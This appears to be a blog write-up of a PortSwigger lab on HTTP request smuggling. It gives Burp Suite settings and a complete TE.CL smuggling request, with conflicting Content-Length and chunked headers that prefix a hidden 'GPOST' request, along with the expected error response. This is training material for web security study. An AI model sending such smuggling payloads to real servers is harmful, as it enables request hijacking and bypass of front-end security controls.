Lab: HTTP request smuggling, basic TE.CL vulnerability
Lab Scenario: Our mission is to explore and exploit a simulated web application's vulnerability to HTTP request smuggling. We'll use the TE.CL technique to manipulate the transfer encoding and content length, revealing potential security weaknesses. Let's dive into the step-by-step solution using Burp Suite:
Configuring Burp Repeater:
- In Burp Suite, go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
Issuing the Smuggling Request:
Using Burp Repeater, issue the following request twice:
makefileCopy codePOST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
Note: Include the trailing sequence
\r\n\r\n
following the final0
.
Observing the Response:
- The second response should indicate: "Unrecognized method GPOST."
Conclusion: This lab exercise provides hands-on experience in exploiting a basic TE.CL vulnerability, showcasing the potential risks associated with HTTP request smuggling. By following this step-by-step guide, users can enhance their understanding of how attackers manipulate transfer encoding and content length to smuggle malicious requests. Stay informed, keep learning, and continue exploring the dynamic field of cybersecurity to contribute to a more secure online environment.
Reference:
https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
Subscribe to my newsletter
Read articles from Joel O. directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
Joel O.
Joel O.
A passionate cybersecurity enthusiast and cloud aficionado. I am on a mission to unravel the complexities of the ever-evolving cyber landscape and guide you through the vast expanse of cloud technology. As a cybersecurity professional, I bring a wealth of experience in securing digital ecosystems and defending against cyber threats. My journey in the cloud realm has been both thrilling and enlightening, and I am here to share my insights, discoveries, and practical tips with you. In these virtual pages, expect a fusion of in-depth cybersecurity analyses and explorations into the limitless possibilities of cloud computing and cybersecurity. Whether you're a seasoned cybersecurity professional, a cloud enthusiast, or someone just stepping into the digital frontier, there's something here for you.